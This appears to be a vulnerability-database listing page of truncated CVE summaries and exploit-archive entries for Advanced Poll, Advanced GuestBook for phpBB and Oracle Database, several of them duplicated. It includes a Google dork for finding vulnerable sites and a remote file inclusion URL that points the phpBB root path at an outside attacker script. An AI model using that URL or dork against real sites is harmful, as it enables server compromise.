CVE-2006-2131

include/classpoll.php in Advanced Poll 2.0.4 uses the HTTPXFORWARDEDFOR X-Forwarded-For HTTP header to identify the IP address of a client, which makes it easier for remote attackers to spoof the source IP and bypass voting restrictions...

CVE-2006-2130

SQL injection vulnerability in include/classpoll.php in Advanced Poll 2.0.4 allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header...

CVE-2006-2130

SQL injection vulnerability in include/classpoll.php in Advanced Poll 2.0.4 allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header...

CVE-2006-2131

include/classpoll.php in Advanced Poll 2.0.4 uses the HTTPXFORWARDEDFOR X-Forwarded-For HTTP header to identify the IP address of a client, which makes it easier for remote attackers to spoof the source IP and bypass voting restrictions...

CVE-2006-2130

The CVE-2006-2130 entry concerns a SQL injection vulnerability in Advanced Poll 2.0.4, exploitable through the User-Agent HTTP header in include/class_poll.php. The connected documents confirm affected software and the root cause is improper handling of User-Agent data, enabling remote attackers ...

CVE-2006-2131

The CVE-2006-2131 entry concerns Advanced Poll 2.0.4, where include/class_poll.php uses the HTTP_X_FORWARDED_FOR header to identify the client IP. The root cause is relying on X-Forwarded-For for IP checks, which allows remote attackers to spoof the source IP and bypass voting restrictions. The a...

Advanced Guestbook 2.x - Addentry.php Remote File Inclusion

Advanced Guestbook 2.x - Addentry.php Remote File Inclusion source: https://www.securityfocus.com/bid/17745/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker ca...

Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================= Advanced GuestBook if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "+ Advanced GuestBook for...

Advanced GuestBook &lt;= 2.4.0 (phpBB) File Inclusion Vulnerability

No description provided by source. Title: Advanced GuestBook for phpBB = 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb" Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...

Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================ Advanced GuestBook = 2.4.0 phpBB File Inclusion Vulnerability ================================================================ Title: Advanced GuestBook for phpBB = 2.4.0...

Advanced Guestbook 2.4.0 - phpBB Remote File Inclusion

Advanced Guestbook 2.4.0 - phpBB Remote File Inclusion !usr/bin/perl use LWP::UserAgent; Bug Found by Oo Exploit coded by n0m3rcy Copyright c 2006 [email protected] Gr33tz; nukedx , Devil-00 , str0ke , cijfer Usage; n0ag.pl if @ARGV ne 3 else sub header print...

Advanced Guestbook 2.4.0 - &#039;phpBB&#039; Remote File Inclusion

!usr/bin/perl use LWP::UserAgent; Bug Found by Oo Exploit coded by n0m3rcy Copyright c 2006 [email protected] Gr33tz; nukedx , Devil-00 , str0ke , cijfer Usage; n0ag.pl if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; pri...

Advanced Guestbook 2.4.0 - &#039;phpBB&#039; File Inclusion

Title: Advanced GuestBook for phpBB = 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb" Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...

Sql injection

Multiple unspecified vulnerabilities in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and other versions have unknown impact and attack vectors in the 1 Advanced Replication component, as identified by Vuln DB01, and 2 Oracle Spatial component, as identified by Vuln DB10. NOTE:...

Design/Logic Flaw

Unspecified vulnerability in Oracle Database Server 9.2.0.6 has unknown impact and attack vectors in the Advanced Replication component, aka Vuln DB02...

Buffer overflow

Buffer overflow in the Advanced Replication component in Oracle Database Server 10.1.0.4 allows database users to execute arbitrary code via the VERIFYLOG procedure of the DBMSSNAPSHOTUTL package, aka Vuln DB03...

CVE-2006-1868

Buffer overflow in the Advanced Replication component in Oracle Database Server 10.1.0.4 allows database users to execute arbitrary code via the VERIFYLOG procedure of the DBMSSNAPSHOTUTL package, aka Vuln DB03...

CVE-2006-1867

Unspecified vulnerability in Oracle Database Server 9.2.0.6 has unknown impact and attack vectors in the Advanced Replication component, aka Vuln DB02...

CVE-2006-1866

Multiple unspecified vulnerabilities in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and other versions have unknown impact and attack vectors in the 1 Advanced Replication component, as identified by Vuln DB01, and 2 Oracle Spatial component, as identified by Vuln DB10. NOTE:...

CVE-2006-1866

CVE-2006-1866 affects Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5 and other versions, with unknown impact/attack vectors in (1) Advanced Replication (DB01) and (2) Oracle Spatial (DB10). Oracle reportedly did not publicly disclose details as of 20060421, but claims exist that DB01 ...